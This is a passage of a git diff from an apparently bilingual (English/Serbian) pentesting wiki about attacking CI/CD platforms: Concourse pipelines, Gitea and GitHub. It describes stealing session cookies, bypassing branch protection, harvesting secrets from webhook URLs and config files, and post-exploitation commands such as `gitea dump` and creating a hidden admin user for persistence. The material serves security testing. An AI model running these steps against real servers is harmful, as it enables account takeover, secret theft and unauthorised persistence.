namespace: concourse-release-main
type: Opaque
data:
secret: MWYyZDFlMmU2N2Rm
secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
```
### Kreirajte Pipeline
### Create Pipeline
Pipeline se sastoji od liste [Jobs](https://concourse-ci.org/jobs.html) koja sadrži uređenu listu [Steps](https://concourse-ci.org/steps.html).
A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
### Koraci
### Steps
Mogu se koristiti nekoliko različitih tipova koraka:
Several different type of steps can be used:
- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **pokreće** [**task**](https://concourse-ci.org/tasks.html)
- [`get` step](https://concourse-ci.org/get-step.html) preuzima [resource](https://concourse-ci.org/resources.html)
- [`put` step](https://concourse-ci.org/put-step.html) ažurira [resource](https://concourse-ci.org/resources.html)
- [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) konfiguriše [pipeline](https://concourse-ci.org/pipelines.html)
- [`load_var` step](https://concourse-ci.org/load-var-step.html) učitava vrednost u [local var](https://concourse-ci.org/vars.html#local-vars)
- [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) pokreće korake paralelno
- [`do` step](https://concourse-ci.org/do-step.html) pokreće korake sekvencijalno
- [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) pokreće korak više puta; jednom za svaku kombinaciju vrednosti varijabli
- [`try` step](https://concourse-ci.org/try-step.html) pokušava da pokrene korak i uspeva čak i ako korak ne uspe
- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
Svaki [step](https://concourse-ci.org/steps.html) u [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) se izvršava u **svojoj kontejneru**. Možete pokrenuti bilo šta što želite unutar kontejnera _(tj. pokrenuti moje testove, pokrenuti ovaj bash skript, izgraditi ovu sliku, itd.)_. Dakle, ako imate posao sa pet koraka, Concourse će kreirati pet kontejnera, po jedan za svaki korak.
Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
Therefore, it's possible to indicate the type of container each step needs to be run in.
### Simple Pipeline Example
Stoga, moguće je naznačiti tip kontejnera u kojem svaki korak treba da se izvrši.
### Jednostavan Primer Pipeline-a
```yaml
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
sleep 1000
echo "$SUPER_SECRET"
params:
SUPER_SECRET: ((super.secret))
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
sleep 1000
echo "$SUPER_SECRET"
params:
SUPER_SECRET: ((super.secret))
```
```bash
@@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
```
Proverite **127.0.0.1:8080** da vidite tok pipeline-a.
Check **127.0.0.1:8080** to see the pipeline flow.
### Bash skripta sa izlazom/ulazom pipeline-a
### Bash script with output/input pipeline
Moguće je **sačuvati rezultate jednog zadatka u datoteku** i označiti da je to izlaz, a zatim označiti ulaz sledećeg zadatka kao izlaz prethodnog zadatka. Ono što concourse radi je da **montira direktorijum prethodnog zadatka u novom zadatku gde možete pristupiti datotekama koje je kreirao prethodni zadatak**.
It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
### Okidači
### Triggers
Ne morate ručno pokretati poslove svaki put kada ih trebate izvršiti, takođe ih možete programirati da se pokreću svaki put:
You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
- Prođe malo vremena: [Time resource](https://github.com/concourse/time-resource/)
- Na nove commit-e na glavnoj grani: [Git resource](https://github.com/concourse/git-resource)
- Novi PR-ovi: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
- Preuzmite ili pošaljite najnoviju sliku vaše aplikacije: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
Pogledajte primer YAML pipeline-a koji se pokreće na nove commit-e na masteru u [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
{{#include ../../banners/hacktricks-training.md}}

134
src/pentesting-ci-cd/gitea-security/README.md
View File

@@ -2,141 +2,129 @@
{{#include ../../banners/hacktricks-training.md}}
## What is Gitea
## Šta je Gitea
**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
**Gitea** je **rešenje za hostovanje koda koje se lako upravlja i koje je samostalno hostovano**, napisano u Go-u.
![](<../../images/image (160).png>)
### Basic Information
### Osnovne informacije
{{#ref}}
basic-gitea-information.md
{{#endref}}
## Lab
To run a Gitea instance locally you can just run a docker container:
## Laboratorija
Da biste pokrenuli Gitea instancu lokalno, možete jednostavno pokrenuti docker kontejner:
```bash
docker run -p 3000:3000 gitea/gitea
```
Povežite se na port 3000 da biste pristupili veb stranici.
Connect to port 3000 to access the web page.
You could also run it with kubernetes:
Takođe možete da ga pokrenete sa kubernetes:
```
helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
## Neautentifikovana Enumeracija
## Unauthenticated Enumeration
- Javni repozitorijumi: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
- Registrovani korisnici: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
- Registrovane organizacije: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
Imajte na umu da **podrazumevano Gitea omogućava novim korisnicima da se registruju**. Ovo neće pružiti posebno zanimljiv pristup novim korisnicima u odnosu na druge organizacije/korisnike repozitorijuma, ali **prijavljeni korisnik** može biti u mogućnosti da **vizualizuje više repozitorijuma ili organizacija**.
Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
## Interna Eksploatacija
## Internal Exploitation
Za ovaj scenario pretpostavićemo da ste dobili neki pristup github nalogu.
For this scenario we are going to suppose that you have obtained some access to a github account.
### Sa Korisničkim Akreditivima/Web Kolačićem
### With User Credentials/Web Cookie
Ako već imate akreditive za korisnika unutar organizacije (ili ste ukrali kolačić sesije) možete **samo da se prijavite** i proverite koje **dozvole imate** nad kojim **repozitorijumima,** u **kojim timovima** se nalazite, **lista drugih korisnika**, i **kako su repozitorijumi zaštićeni.**
If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
Imajte na umu da se **2FA može koristiti** tako da ćete moći da pristupite ovim informacijama samo ako takođe možete **proći tu proveru**.
> [!NOTE]
> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
> Imajte na umu da ako **uspete da ukradete `i_like_gitea` kolačić** (trenutno konfigurisan sa SameSite: Lax) možete **potpuno imitirati korisnika** bez potrebe za akreditivima ili 2FA.
### With User SSH Key
### Sa Korisničkim SSH Ključem
Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
Gitea omogućava **korisnicima** da postave **SSH ključeve** koji će se koristiti kao **metoda autentifikacije za implementaciju koda** u njihovo ime (2FA se ne primenjuje).
Sa ovim ključem možete izvršiti **promene u repozitorijumima gde korisnik ima neka prava**, međutim ne možete ga koristiti za pristup gitea api da enumerišete okruženje. Međutim, možete **enumerisati lokalne postavke** da dobijete informacije o repozitorijumima i korisniku kojem imate pristup:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
Ako je korisnik konfigurisao svoje korisničko ime kao svoje gitea korisničko ime, možete pristupiti **javnim ključevima koje je postavio** na svom nalogu na _https://github.com/\<gitea_username>.keys_, možete proveriti ovo da potvrdite da li se privatni ključ koji ste pronašli može koristiti.
If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\<gitea_username>.keys_, you could check this to confirm the private key you found can be used.
**SSH ključevi** se takođe mogu postaviti u repozitorijume kao **deploy ključevi**. Svako ko ima pristup ovom ključiću moći će da **pokrene projekte iz repozitorijuma**. Obično, na serveru sa različitim deploy ključevima, lokalna datoteka **`~/.ssh/config`** će vam dati informacije o tome kojem ključu pripada.
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
#### GPG Ključevi
#### GPG Keys
As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
Check locally if the current user has any key with:
Kao što je objašnjeno [**ovde**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md), ponekad je potrebno potpisati commit-e ili biste mogli biti otkriveni.
Proverite lokalno da li trenutni korisnik ima neki ključ sa:
```shell
gpg --list-secret-keys --keyid-format=long
```
### Sa korisničkim tokenom
### With User Token
Za uvod o [**korisničkim tokenima proverite osnovne informacije**](basic-gitea-information.md#personal-access-tokens).
For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
Korisnički token može biti korišćen **umesto lozinke** za **autentifikaciju** protiv Gitea servera [**putem API-ja**](https://try.gitea.io/api/swagger#/). Imaće **potpun pristup** korisniku.
A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
### Sa Oauth aplikacijom
### With Oauth Application
Za uvod o [**Gitea Oauth aplikacijama proverite osnovne informacije**](./#with-oauth-application).
For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application).
Napadač može kreirati **malicious Oauth aplikaciju** da bi pristupio privilegovanim podacima/akcijama korisnika koji je verovatno prihvataju kao deo phishing kampanje.
An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
Kao što je objašnjeno u osnovnim informacijama, aplikacija će imati **potpun pristup korisničkom nalogu**.
As explained in the basic information, the application will have **full access over the user account**.
### Zaobilaženje zaštite grane
### Branch Protection Bypass
U Github-u imamo **github akcije** koje po defaultu dobijaju **token sa pristupom za pisanje** nad repozitorijumom koji se može koristiti za **zaobilaženje zaštita grane**. U ovom slučaju to **ne postoji**, tako da su zaobilaženja ograničenija. Ali hajde da pogledamo šta može da se uradi:
In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
- **Omogući Push**: Ako bilo ko sa pristupom za pisanje može da pošalje na granu, samo pošaljite na nju.
- **Whitelist Restrict Pus**h: Na isti način, ako ste deo ove liste, pošaljite na granu.
- **Omogući Merge Whitelist**: Ako postoji whitelist za spajanje, morate biti unutar nje.
- **Zahtevajte odobrenja veće od 0**: Tada... morate kompromitovati drugog korisnika.
- **Ograničite odobrenja na whitelisted**: Ako samo whitelisted korisnici mogu odobriti... morate kompromitovati drugog korisnika koji je unutar te liste.
- **Odbacite zastarela odobrenja**: Ako odobrenja nisu uklonjena novim commit-ima, mogli biste preuzeti već odobren PR da ubacite svoj kod i spojite PR.
- **Enable Push**: If anyone with write access can push to the branch, just push to it.
- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
- **Require approvals is bigger than 0**: Then... you need to compromise another user
- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
Napomena: **ako ste admin org/repo** možete zaobići zaštite.
Note that **if you are an org/repo admin** you can bypass the protections.
### Nabrajanje Webhook-ova
### Enumerate Webhooks
**Webhook-ovi** su sposobni da **pošalju specifične gitea informacije na neka mesta**. Možda ćete moći da **iskoristite tu komunikaciju**.\
Međutim, obično se postavlja **tajna** koju ne možete **dobiti** u **webhook-u** koja će **sprečiti** spoljne korisnike koji znaju URL webhook-a, ali ne i tajnu, da **iskoriste taj webhook**.\
Ali u nekim prilikama, ljudi umesto da postave **tajnu** na njeno mesto, **postavljaju je u URL** kao parametar, tako da **proveravanje URL-ova** može omogućiti da **pronađete tajne** i druga mesta koja biste mogli dalje iskoristiti.
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
Webhook-ovi se mogu postaviti na **repo i na org nivou**.
Webhooks can be set at **repo and at org level**.
## Post Eksploatacija
## Post Exploitation
### Unutar servera
### Inside the server
Ako ste nekako uspeli da uđete u server na kojem Gitea radi, trebali biste potražiti Gitea konfiguracioni fajl. Po defaultu se nalazi u `/data/gitea/conf/app.ini`
If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
U ovom fajlu možete pronaći **ključeve** i **lozinke**.
In this file you can find **keys** and **passwords**.
U Gitea putanji (po defaultu: /data/gitea) možete pronaći i zanimljive informacije kao što su:
In the gitea path (by default: /data/gitea) you can find also interesting information like:
- **sqlite** DB: Ako Gitea ne koristi eksternu bazu podataka, koristiće sqlite bazu.
- **sesije** unutar foldera sesija: Pokretanjem `cat sessions/*/*/*` možete videti korisnička imena prijavljenih korisnika (Gitea takođe može sačuvati sesije unutar DB-a).
- **jwt privatni ključ** unutar jwt foldera.
- Više **osetljivih informacija** može se pronaći u ovom folderu.
- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
- The **jwt private key** inside the jwt folder
- More **sensitive information** could be found in this folder
Ako ste unutar servera, možete takođe **koristiti `gitea` binarni fajl** za pristup/modifikaciju informacija:
If you are inside the server you can also **use the `gitea` binary** to access/modify information:
- `gitea dump` will dump gitea and generate a .zip file
- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
- `gitea admin user change-password --username admin --password newpassword` Change the password
- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
- `gitea dump` će dumpovati Gitea i generisati .zip fajl.
- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` će generisati token naznačenog tipa (persistence).
- `gitea admin user change-password --username admin --password newpassword` promenite lozinku.
- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` kreirajte novog admin korisnika i dobijte pristupni token.
{{#include ../../banners/hacktricks-training.md}}

116
src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
View File

@@ -1,107 +1,103 @@
# Basic Gitea Information
# Osnovne Gitea Informacije
{{#include ../../banners/hacktricks-training.md}}
## Basic Structure
## Osnovna Struktura
The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
Osnovna struktura Gitea okruženja je grupisanje repozitorijuma po **organizacijama**, svaka od njih može sadržati **several repositories** i **several teams**. Međutim, imajte na umu da, kao i na github-u, korisnici mogu imati repozitorijume van organizacije.
Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
Štaviše, **korisnik** može biti **član** **različitih organizacija**. Unutar organizacije korisnik može imati **različite dozvole za svaki repozitorijum**.
A user may also be **part of different teams** with different permissions over different repos.
Korisnik može biti i **deo različitih timova** sa različitim dozvolama za različite repozitorijume.
And finally **repositories may have special protection mechanisms**.
I konačno, **repozitorijumi mogu imati posebne mehanizme zaštite**.
## Permissions
## Dozvole
### Organizations
### Organizacije
When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
Kada se **organizacija kreira**, tim pod nazivom **Vlasnici** se **kreira** i korisnik se stavlja unutra. Ovaj tim će dati **admin pristup** nad **organizacijom**, te **dozvole** i **ime** tima **se ne mogu menjati**.
**Org admins** (owners) can select the **visibility** of the organization:
**Org admini** (vlasnici) mogu odabrati **vidljivost** organizacije:
- Public
- Limited (logged in users only)
- Private (members only)
- Javno
- Ograničeno (samo prijavljeni korisnici)
- Privatno (samo članovi)
**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
**Org admini** takođe mogu naznačiti da li **repo admini** mogu **dodavati ili uklanjati pristup** za timove. Takođe mogu naznačiti maksimalan broj repozitorijuma.
When creating a new team, several important settings are selected:
Kada se kreira novi tim, biraju se nekoliko važnih podešavanja:
- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
- It's also indicated **if members can create new repos** (creator will get admin access to it)
- The **permissions** the **members** of the repo will **have**:
- **Administrator** access
- **Specific** access:
- Naznačuje se **repozitorijumi organizacije kojima će članovi tima moći da pristupaju**: specifični repozitorijumi (repozitorijumi gde je tim dodat) ili svi.
- Takođe se naznačuje **da li članovi mogu kreirati nove repozitorijume** (kreator će dobiti admin pristup).
- **Dozvole** koje će **članovi** repozitorijuma **imati**:
- **Administrator** pristup
- **Specifičan** pristup:
![](<../../images/image (118).png>)
### Teams & Users
### Timovi i Korisnici
In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
U repozitorijumu, **org admin** i **repo admini** (ako to dozvoljava org) mogu **upravljati ulogama** dodeljenim saradnicima (drugim korisnicima) i timovima. Postoje **3** moguće **uloge**:
- Administrator
- Write
- Read
- Pisanje
- Čitanje
## Gitea Authentication
## Gitea Autentifikacija
### Web Access
### Web Pristup
Using **username + password** and potentially (and recommended) a 2FA.
Korišćenje **korisničkog imena + lozinke** i potencijalno (i preporučeno) 2FA.
### **SSH Keys**
### **SSH Ključevi**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
Možete konfigurisati svoj nalog sa jednim ili više javnih ključeva koji omogućavaju povezani **privatni ključ da izvršava radnje u vaše ime.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG Keys**
#### **GPG Ključevi**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
Ne **možete se pretvarati da ste korisnik sa ovim ključevima**, ali ako ih ne koristite, može biti moguće da **budete otkriveni zbog slanja commit-a bez potpisa**.
### **Personal Access Tokens**
### **Lični Pristupni Tokeni**
You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
Možete generisati lični pristupni token da **dajte aplikaciji pristup vašem nalogu**. Lični pristupni token daje potpun pristup vašem nalogu: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth Applications
### Oauth Aplikacije
Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
Baš kao lični pristupni tokeni, **Oauth aplikacije** će imati **potpun pristup** vašem nalogu i mestima kojima vaš nalog ima pristup, jer, kao što je naznačeno u [dokumentaciji](https://docs.gitea.io/en-us/oauth2-provider/#scopes), opsezi još nisu podržani:
![](<../../images/image (194).png>)
### Deploy keys
### Ključevi za Deploy
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
Ključevi za deploy mogu imati pristup samo za čitanje ili pisanje repozitorijumu, tako da mogu biti zanimljivi za kompromitovanje specifičnih repozitorijuma.
## Branch Protections
## Zaštite Grana
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
Zaštite grana su dizajnirane da **ne daju potpunu kontrolu nad repozitorijumom** korisnicima. Cilj je **postaviti nekoliko metoda zaštite pre nego što se može pisati kod unutar neke grane**.
The **branch protections of a repository** can be found in _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
**Zaštite grana repozitorijuma** mogu se naći na _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
> [!NOTE]
> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
> **Nije moguće postaviti zaštitu grane na nivou organizacije**. Tako da sve one moraju biti deklarisane na svakom repozitorijumu.
Different protections can be applied to a branch (like to master):
Različite zaštite mogu se primeniti na granu (kao na master):
- **Disable Push**: No-one can push to this branch
- **Enable Push**: Anyone with access can push, but not force push.
- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
- **Enable Status checks:** Require status checks to pass before merging.
- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
- **Block merge on official review requests**: If there official review requests it cannot be merged
- **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
- **Require Signed Commits**: Commits must be signed.
- **Block merge if pull request is outdated**
- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
- **Onemogući Push**: Niko ne može da pošalje na ovu granu
- **Omogući Push**: Svako ko ima pristup može da pošalje, ali ne može da forsira push.
- **Whitelist Ograničen Push**: Samo odabrani korisnici/timovi mogu da pošalju na ovu granu (ali ne može forsirati push)
- **Omogući Merge Whitelist**: Samo korisnici/timovi sa liste mogu da spoje PR-ove.
- **Omogući Status provere:** Zahteva da provere statusa prođu pre spajanja.
- **Zahteva odobrenja**: Naznačite broj odobrenja potrebnih pre nego što se PR može spojiti.
- **Ograniči odobrenja na belu listu**: Naznačite korisnike/timove koji mogu odobriti PR-ove.
- **Blokiraj spajanje na odbijenim recenzijama**: Ako su tražene izmene, ne može se spojiti (čak i ako ostale provere prođu)
- **Blokiraj spajanje na zvanične zahteve za recenziju**: Ako postoje zvanični zahtevi za recenziju, ne može se spojiti
- **Odbaci zastarele odobrenja**: Kada su novi commit-i, stara odobrenja će biti odbijena.
- **Zahteva Potpisane Commit-e**: Commit-i moraju biti potpisani.
- **Blokiraj spajanje ako je pull request zastareo**
- **Zaštićeni/Nezaštićeni obrasci datoteka**: Naznačite obrasce datoteka za zaštitu/nezaštitu od izmena
> [!NOTE]
> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
> Kao što možete videti, čak i ako ste uspeli da dobijete neka akreditivna sredstva korisnika, **repozitorijumi mogu biti zaštićeni sprečavajući vas da šaljete kod na master**, na primer, da kompromitujete CI/CD pipeline.
{{#include ../../banners/hacktricks-training.md}}

256
src/pentesting-ci-cd/github-security/README.md
View File

@@ -2,41 +2,41 @@
{{#include ../../banners/hacktricks-training.md}}
## What is Github
## Šta je Github
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) Na visokom nivou, **GitHub je veb sajt i usluga zasnovana na oblaku koja pomaže programerima da čuvaju i upravljaju svojim kodom, kao i da prate i kontrolišu promene u svom kodu**.
### Basic Information
### Osnovne informacije
{{#ref}}
basic-github-information.md
{{#endref}}
## External Recon
## Spoljašnje istraživanje
Github repositories can be configured as public, private and internal.
Github repozitorijumi mogu biti konfigurisani kao javni, privatni i interni.
- **Private** means that **only** people of the **organisation** will be able to access them
- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
- **Public** means that **all internet** is going to be able to access it.
- **Privatni** znači da će **samo** ljudi iz **organizacije** moći da im pristupe
- **Interni** znači da će **samo** ljudi iz **preduzeća** (preduzeće može imati nekoliko organizacija) moći da mu pristupe
- **Javni** znači da će **svi na internetu** moći da mu pristupe.
In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
U slučaju da znate **korisnika, repozitorijum ili organizaciju koju želite da ciljate**, možete koristiti **github dorks** da pronađete osetljive informacije ili pretražujete **curenja osetljivih informacija** **u svakom repozitorijumu**.
### Github Dorks
Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
Github omogućava da **pretražujete nešto specificirajući kao opseg korisnika, repozitorijuma ili organizacije**. Stoga, sa listom stringova koji će se pojaviti blizu osetljivih informacija, možete lako **pretraživati potencijalne osetljive informacije u vašem cilju**.
Tools (each tool contains its list of dorks):
Alati (svaki alat sadrži svoju listu dorks):
- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Lista Dorks](https://github.com/obheda12/GitDorker/tree/master/Dorks))
- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Lista Dorks](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Lista Dorks](https://github.com/hisxo/gitGraber/tree/master/wordlists))
### Github Leaks
### Github Curenja
Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
Molimo vas, imajte na umu da su github dorks takođe namenjeni pretraživanju curenja koristeći github opcije pretrage. Ova sekcija je posvećena onim alatima koji će **preuzeti svaki repozitorijum i pretražiti osetljive informacije u njima** (čak proveravajući određenu dubinu commit-a).
Tools (each tool contains its list of regexes):
Alati (svaki alat sadrži svoju listu regex-a):
- [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
- [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog)
@@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes):
- [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
> [!WARNING]
> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
> Kada tražite curenja u repozitorijumu i pokrenete nešto poput `git log -p`, ne zaboravite da mogu postojati **druge grane sa drugim commit-ima** koje sadrže tajne!
### External Forks
### Spoljašnji Forkovi
It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork).
Moguće je **kompromitovati repozitorijume zloupotrebom pull zahteva**. Da biste znali da li je repozitorijum ranjiv, uglavnom treba da pročitate Github Actions yaml konfiguracije. [**Više informacija o ovome u nastavku**](./#execution-from-a-external-fork).
### Github Leaks in deleted/internal forks
### Github Curenja u obrisanim/internim forkovima
Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
Čak i ako su obrisani ili interni, može biti moguće dobiti osetljive podatke iz forkova github repozitorijuma. Proverite ovde:
{{#ref}}
accessible-deleted-data-in-github.md
{{#endref}}
## Organization Hardening
## Ojačavanje organizacije
### Member Privileges
### Privilegije članova
